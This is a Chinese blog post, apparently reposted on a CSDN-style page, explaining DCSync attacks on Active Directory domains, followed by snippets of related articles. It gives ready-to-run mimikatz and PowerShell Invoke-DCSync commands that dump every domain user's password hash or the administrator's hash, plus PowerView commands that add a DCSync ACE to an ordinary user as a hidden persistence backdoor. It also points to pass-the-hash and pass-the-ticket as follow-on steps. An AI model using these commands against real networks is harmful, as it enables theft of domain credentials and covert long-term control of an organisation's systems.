域渗透-DCSync

最新推荐文章于 2024-06-10 16:04:44 发布
最新推荐文章于 2024-06-10 16:04:44 发布
阅读量1.3k 收藏 1
点赞数
文章标签: 安全
原文链接:https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html
版权

作者:Zahad003
原文链接:https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html

DCSync是域渗透中经常用到的技术(我在大致学习了以后发现确实如此)

利用条件:

获得以下任一用户的权限:

Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机帐户

Mimikatz实现

导出域内所有用户hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /all /csv" exit
导出指定用户Hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:Mikasa.com /user:administrator /csv" exit

img

Powershell实现

https://gist.github.com/monoxgas/9d238accd969550136db

我这里面用CS的Powershell-import导入后使用

导出所有用户

Invoke-DCSync -DumpForest | ft -wrap -autosize

img

导出administrator

Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize

img

导出后我们就可以pth,ptt了

利用DCSync权限维持

利用条件
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1#L8270

Domain Admins组内的用户
Enterprise Admins组内的用户

看了一下,好像是利用DCSync对普通用户添加ACE,用于修改ACL(Access Conotrol list),让普通用户也有获取到域管理员密码hash的权限

先使用Beacon自带的,powershell-import导入后使用

添加ACE
powershell Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose
删除ACE
powershell Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test1 -Rights DCSync -Verbose

效果

img

站在前人的肩膀上!!

EOF[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BYoCkMgT-1645859522662)(http://q2.qlogo.cn/headimg_dl?dst_uin=1941748801&spec=100&t=1634720993174)]本文作者: M1kasa本文链接: https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html关于博主: 评论和私信会在第一时间回复。或者直接私信我。版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!声援博主: 如果您觉得文章对您有帮助,可以点击文章右下角**【[推荐](javascript:void(0)😉】**一下。

标签: 内网渗透/域渗透

推荐该文 关注博主关注博主 收藏本文 分享微博 分享微信

(javascript:void(0))

明月清风~~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透——DCSync
systemino的博客
07-31 7056
0x00 前言 DCSync是渗透中经常会用到的技术,本文会对开源的资料进行整理,结合自己的经验,总结利用和防御检测的方法。 0x01 简介 本文将要介绍以下内容: ·利用DCSync导出内所有用户hash的方法。 ·利用DCSync在内维持权限的方法。 ·自动化检测DCSync后门的方法。 0x02 利用DCSync导出内所有用户hash的方法 DCSync是mim...
mimikatz常用命令总结
热门推荐
Shanfenglan's blog
08-27 24万+
前言 在管理员权限下使用,如果没有管理员权限,基本每个功能都无法正常使用,切记。 命令 普通管理员权限可以执行的命令(密码查询与权限检测与日志记录) lsadump::lsa /inject 可以查看所有用户的所有详细信息 privilege::debug 打开第一个命令,且必须执行。 log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。 sekurlsa::logonpasswords 列出已登陆用户的密码(比较常用) 控权限才能执行的命令 lsadump::dc
内攻击 ----> DCSync
最新发布
huohaowen的博客
06-10 1107
其实严格意义上来说DCSync这个技术,并不是一种横向得技术,而是更偏向于权限维持吧!但是其实也是可以用来横向(配合NTLM Realy),如果不牵强说得话!那么下面,我们就来看看这个DCSync的技术。
内网渗透测试:DCSync 攻击技术的利用
xnxqwzy的博客
08-21 514
环境中,不同控制器(DC)之间,每 15 分钟都会有一次数据的同步。当一个控制器(DC 1)想从其他控制器(DC 2)获取数据时,DC 1 会向DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges接口向控发起数据同步请求。
内网常见内攻击
Amire0x的小乐园
11-30 1265
内攻击 kerberos攻击 利用黄金票据+dcsync获取密码 先获取黄金票据 获取密码 lsadump::dcsync /user:用户 /domain:名称 成功 用户、密码枚举 工具 用户枚举 先导入 Import-Module .\DomainPasswordSpray.ps1 然后执行 Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -
Mimikatz各模块基本用法
Canterlot的博客
09-04 1696
介绍内网环境中mimikatz各模块最常用功能及用法
权限维持】-DCsync
qq_41617902的博客
01-20 493
DCsync:模拟控制器并从控制器导出帐户密码hash
116_Windows 渗透 - 用户密码枚举1
08-03
该命令将会从环境中获取用户名,然后逐个以密码 Winter2016 进行认证枚举该命令将会从 users.txt 中提取用户名,与 passlist.txt
渗透之流量劫持
02-01
windowsDomain中文翻译为既是Windows网络操作系统的逻辑组织单元,也是...在网络渗透攻击中,攻击者如果获取了的权限,那么攻击者就有可能获取公司的机密,控制公司的一切。所以安全是企业安全最为核心的一个
渗透--nmap
04-18
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络...
mimikazi教程
tomyyyyy
08-24 2023
目录mimikazi教程1、简介1.1、背景介绍1.2、官方链接1.3、mimikatz 与凭证2、基本使用2.1、常用命令2.2、远程连接使用2.3、本地使用2.4、读取控成员Hash2.4.1、控本地读取2.4.2、导出成员Hash2.4.3、secretsdump脚本直接导出hash2.5、哈希传递2.5.1、工作组环境2.5.2 环境2.6 票据传递攻击(PTT)2.6.1 黄...
渗透之DCSYNC攻击
weixin_65550121的博客
12-09 1120
2015年八月份Mimikatz新增了一个主要功能叫做"Dcsync",使用这项技术可以有效的模拟控制器并从目标控上请求内用户的Hash,这项技术为当下渗透提供了极大的便利,可以直接远程dump内hash,另外也衍生出很多的攻击方式。在内,不同的控制器之间,每隔15分钟都会有一次数据的同步,当一个控制器想从其他控制器上面获取数据时,DC1会向DC2发起一个GetNCChanges请求,该请求的数据,包括需要同步的数据,如果需要同步的数据比较多,则会重复上面的过程。
环境权限维持之Dcsync
good good study
04-19 1397
当获得了内管理员权限,如果能修改内普通用户的权限,使其具有DCSync权限的话,那么普通用户也能导出内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有控主机账号和管理员能Dcsync,管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump哈希
集权安全 | 渗透中的 DCSync技术分析
ZAWX_NETSTARSEC的博客
05-26 1145
DCSync是AD渗透中常用的凭据窃取手段,默认情况下,内不同DC每隔15分钟会进行一次数据同步,当一个DC从另外一个DC同步数据时,发起请求的一方会通过目录复制协议(MS- DRSR)来对另外一台控中的用户密码进行复制,DCSync就是利用这个原理,“模拟”DC向真实DC发送数据同步请求,获取用户凭据数据,由于这种攻击利用了Windows RPC协议,并不需要登陆控或者在控上落地文件,避免触发EDR告警,因此DCSync时一种非常隐蔽的凭据窃取方式。
利用DSCync进行内权限维持
good good study
03-02 492
一个环境可以拥有多台控制器,每台控制器各自存储着一份所在的活动目录的可写副本,对目录的任何修改都可以从源控制器同步到本树或林中的其他控制器上。当一个控想从另一个控获取数据更新时,客户端控会向服务端控发送DSGetNCChanges请求,该请求的响应将包含客户端控必须应用到其他活动目录副本的一组更新。通过情况下,控制器之间每15分钟就会有一次数据同步。DCSync技术就是利用控制器同步的原理,通过DRS服务的某接口向控发起数据同步请求。
DCSync:攻击与检测
Ping_Pig的博客
09-09 1870
讲在前面: Mimkatz在2015年8月添加的一个主要特性是“DCSync”,它可以有效地“模拟”一个控制器,并向目标控制器请求帐户密码数据。DCSync由Benjamin Delpy和Vincent Le Toux编写。 使用适当的权限来利用Mimikatz的DCSync,攻击者可以通过网络从控制器获取密码hash和以前的密码hash,从而不需要进行交互式的登录或复制Active Directory数据库文件(ntdd .dit)来得到密码hash 运行DCSync需要特殊权限。管理员、

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值